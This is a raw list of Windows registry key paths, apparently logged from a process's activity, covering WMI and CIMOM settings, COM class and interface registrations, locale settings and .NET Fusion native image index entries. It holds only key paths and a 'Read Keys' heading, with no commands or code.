HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{69962C5E-BB46-4467-9481-1E53F307B17B}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{A9D8E4F3-6922-4CA7-97E2-62BE524DECC2}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms)
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\ESS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks
HKEY_LOCAL_MACHINE\software\microsoft\wbem\cimom
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/subscription
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\CIMV2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\CIMV2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}\InProcServer32
HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="CIMWin32"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2\SCM Event Provider
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\minint
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Cimom
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\wmiprvse.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocHandler
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
